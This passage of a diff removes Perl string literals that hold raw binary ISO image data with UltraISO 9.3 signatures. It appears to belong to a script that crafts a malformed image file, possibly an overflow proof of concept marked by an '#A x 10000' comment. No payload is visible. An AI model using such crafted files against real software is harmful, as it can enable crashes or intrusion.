-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x3E\x7B\x7C\x00\x00\x00\x00\x00\x00\x00\x00\x23\x35\xB6\x8E".
-	        "\x2E\xA5\x97\x35\x54\x4F\x6E\xCA\x98\xF7\xB9\x7D\xA6\xC3\xBE\x27\xB4\xEF\xE4\x53\xA0\x4D\xC6\x52\xDA\xD2\x2B\x9E\xC0\xAC\xFD\x55".
-	        "\xEA\x74\x42\x74\x38\x0E\x5F\xB0\x7C\x70\xD7\x0D\x8B\xB3\xA3\xDE\x2E\x12\xFC\xAA\x40\xD5\xA7\xFF\xA9\xDF\x3C\xE2\xFE\xA4\xAF\x87".
-	        "\x8A\x0C\xF9\x37\x65\x37\xA8\x07\x42\x8A\x8E\x38\x8E\x0E\x2B\x86\xB2\x8D\x61\x62\xF1\xCB\x78\x86\xEF\x05\x5C\x2D\x56\xE8\xEF\x9C".
-	        "\xDE\x7E\xC0\xA9\xCC\x36\xD6\x86\xA7\x17\xC5\x2E\x95\x2B\xB6\xCF\x37\x9C\xA7\xDF\x92\x75\xF3\x7A\x50\x7A\x2B\x01\x4C\xB4\x66\x64".
-	        "\xFE\xE4\xB3\x92\xB3\xFC\x62\x33\xDA\x94\x62\xC7\x90\x1F\x9A\xEE\x79\xB7\xBA\xE2\xFE\xDC\xC9\x44\xC8\x54\x6C\x2F\x8A\x29\xAD\xA2".
-	        "\xBE\x0E\xBE\x5A\x6D\xC5\xA0\xD6\x2A\xE3\x26\x21\xA8\x2A\x8B\xD9\xDD\x40\xE6\x77\x5C\xFB\xE0\x04\x61\xE6\xBC\xAD\x03\x4E\x5D\x2A".
-	        "\x5B\x58\x2B\x6C\xFC\x8F\xE7\x9B\x43\x44\xD3\xD5\x5C\x4B\x65\x46\x6A\x62\x31\x13\x3E\xD3\x4A\x8E\xB1\x1B\x77\x5D\x09\xC9\x37\xFC".
-	        "\x01\xBA\xA2\x73\x97\xCB\xE2\x71\xA7\x70\x9A\x7F\xA5\x92\xB8\xA2\x0D\xEB\x72\xB1\x9C\x86\x1F\x6C\x38\x4E\x3F\x14\x5A\x84\x87\x88".
-	        "\x5E\x93\x73\x49\x87\xEF\xF2\x26\x09\x94\xD9\xB1\xB0\x6E\xD6\xC7\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x17\x01".
-	        "\x02\x43\x44\x30\x30\x31\x01\x00\x00\x57\x00\x69\x00\x6E\x00\x33\x00\x32\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x32\x00\x30\x00\x30\x00\x39\x00\x30\x00\x34\x00\x30\x00\x32\x00\x5F\x00\x30\x00\x33\x00\x31".
-	        "\x00\x34\x00\x30\x00\x34\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x22\x00\x00\x00\x00\x00\x00\x22\x25\x2F\x45\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x01\x00\x00\x01".
-	        "\x00\x08\x08\x00\x3A\x00\x00\x00\x00\x00\x00\x3A\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x00\x00\x00\x22\x00\x1C\x00".
-	        "\x00\x00\x00\x00\x00\x1C\x00\x08\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x01\x00\x00\x01\x01\x00\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x55".
-	        "\x00\x6C\x00\x74\x00\x72\x00\x61\x00\x49\x00\x53\x00\x4F\x00\x20\x00\x56\x00\x39\x00\x2E\x00\x33\x00\x20\x00\x43\x00\x44\x00\x20".
-	        "\x00\x26\x00\x20\x00\x44\x00\x56\x00\x44\x00\x20\x00\x43\x00\x72\x00\x65\x00\x61\x00\x74\x00\x6F\x00\x72\x00\x2C\x00\x20\x00\x28".
-	        "\x00\x63\x00\x29\x00\x32\x00\x30\x00\x30\x00\x39\x00\x20\x00\x45\x00\x5A\x00\x42\x00\x20\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65".
-	        "\x00\x6D\x00\x73\x00\x2C\x00\x20\x00\x49\x00\x6E\x00\x63\x00\x2E\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00".
-	        "\x20\x00\x20\x00\x20\x00\x20\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20".
-	        "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x20\x32\x30\x30\x39\x30\x34\x30\x32\x30\x33\x31\x35\x30\x36\x30\x30\xE0\x32\x30".
-	        "\x30\x39\x30\x34\x30\x32\x30\x33\x31\x35\x30\x36\x30\x30\xE0\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x00".
-	        "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x00\x01\x00\x55\x4C\x54\x52\x41\x49\x53\x4F\x00\x39\x2E\x33\x2E".
-	        "\x33\x2E\x32\x36\x38\x35\x00\xC8\x14\x05\x00\x00\x00\x00\x00\x1F\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\xAA\x46\xBA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3C\xF4\x26\x29\x3A\x1C\x03\x30\x4B\x8A\xFA\x07\x0F\xB5\x0F\x63\xBC\x07\x0F\xBC".
-	        "\xBC\x88\x0F\xB2\x45\x2B\x2D\xD3\xA2\x55\xC9\xD3\xCB\x75\x85\x85\x92\xC4\x3A\x74\x40\x25\x14\xD9\x2B\x43\x77\x96\x2B\x16\xF4\x71".
-	        "\xC4\x80\x18\xEA\x55\xF9\xB3\xF2\xA4\x12\xCF\x6F\xCF\xA9\xCF\x62\xCF\xF3\xF4\xBF\x48\x83\xA4\x9B\x57\x72\x48\x78\x48\x6D\x48\x34".
-	        "\x74\xE1\x0C\xB6\x01\x36\x00\x2E\x72\x4B\x2E\x8B\xEB\x31\x1F\xD0\x1F\x5E\xAD\x2F\x1F\xDA\xAD\x8A\x1F\xE1\x65\x77\x2D\xE3\xEE\x60".
-	        "\x9B\xE6\x82\x49\xCA\xF7\xAB\xC6\x08\x7A\x73\x22\x07\x9E\x23\x5C\x4E\x64\x03\x23\xFC\x48\xF7\xB8\x0D\xF1\x43\xA6\xB6\x5A\xB7\x1E".
-	        "\xDF\x13\xDF\x91\xDF\x6C\xDF\xE3\xE5\x8F\x78\x8D\x1C\xD3\x11\x5E\x78\x64\x78\x0B\x78\x48\x66\xB9\x80\x74\xD0\x16\x48\x0B\x50\x0A".
-	        "\x1A\x2A\xDE\xE5\xE1\x1A\xD2\xC1\xD0\x9D\xEB\x1D\xF9\x1D\xDA\x95\xD8\xF9\xB3\xDB\xE9\xD3\xB5\xA4\xD2\xB7\xCE\xEE\xDB\x3A\xC5\x35".
-	        "\x7B\xD5\x31\xAF\x0E\x5B\x50\x92\x92\xB7\x14\x78\x5E\x6C\xA4\xB0\x17\x18\x6F\xD9\x5D\x9C\x95\x94\x7B\x75\xDA\x97\xA1\xAD\x8D\x24".
-	        "\xF0\xB9\x87\x44\x18\x2B\x7C\x0B\x06\xCD\xB5\x9A\x4A\x42\x4F\x16\xC3\x0B\x6F\x02\xD8\x4E\x5B\xEB\xE9\xE0\xCC\xBA\x64\x0B\x0C\x5D".
-	        "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x18\x01\xFF\x43\x44\x30\x30\x31";
-                #A x 10000
-my $img_data2 =  "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
